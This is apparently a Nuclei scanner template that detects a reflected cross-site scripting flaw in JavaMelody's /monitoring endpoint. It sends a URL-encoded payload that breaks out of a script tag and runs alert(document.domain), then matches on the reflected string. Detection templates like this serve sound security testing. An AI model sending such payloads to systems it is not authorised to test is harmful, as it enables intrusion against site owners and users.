id: java-melody-xss

info:
  name: JavaMelody Monitoring XSS
  author: kailashbohara
  severity: medium
  description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
  reference:
    - https://github.com/Hurdano/JavaMelody-XSS
    - https://github.com/javamelody/javamelody/pull/555
  tags: xss,javamelody

http:
  - method: GET
    path:
      - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
